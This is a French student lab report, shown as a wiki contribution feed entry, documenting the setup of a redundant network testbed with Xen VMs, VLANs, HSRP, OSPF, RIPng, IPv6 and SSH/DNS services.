<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
		<id>https://wiki-ima.plil.fr/mediawiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Aaitmouh</id>
		<title>Wiki d'activités IMA - Contributions de l’utilisateur [fr]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki-ima.plil.fr/mediawiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Aaitmouh"/>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php/Sp%C3%A9cial:Contributions/Aaitmouh"/>
		<updated>2026-09-19T22:53:32Z</updated>
		<subtitle>Contributions de l’utilisateur</subtitle>
		<generator>MediaWiki 1.29.2</generator>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52178</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52178"/>
				<updated>2020-01-30T10:48:42Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Configuration bind9 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
* '''SSH'''&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion sécurisée (SSH) de management en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet (en Clair) que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain se rapproche de la notion de domaine de diffusion voire VLAN avec des options plus poussés pour le filtrage et le forwarding [https://www.cisco.com/c/en/us/td/docs/routers/asr1000/configuration/guide/chassis/bdi.html  plus]. Pour permettre à notre routeur d'avoir une interface sur un bridge domaine on doit lui configurer une interface logique appelée BDI (Bridge Domain Interface) .Un routeur peut avoir plusieurs Bridge Domaines mais un Bridge Domaine n'accepte qu'une seule BDI. &lt;br /&gt;
&lt;br /&gt;
On en profite aussi pour faire notre configuration HSRP (Hot standby router protocol) [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus] et IPv6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Et pour le management&lt;br /&gt;
  interface BDI300&lt;br /&gt;
   ip address 10.60.200.1 255.255.255.0&lt;br /&gt;
   no shut&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier '''etc/ssh/sshd_config''' de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier '''/etc/bind/named.conf.options''' la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
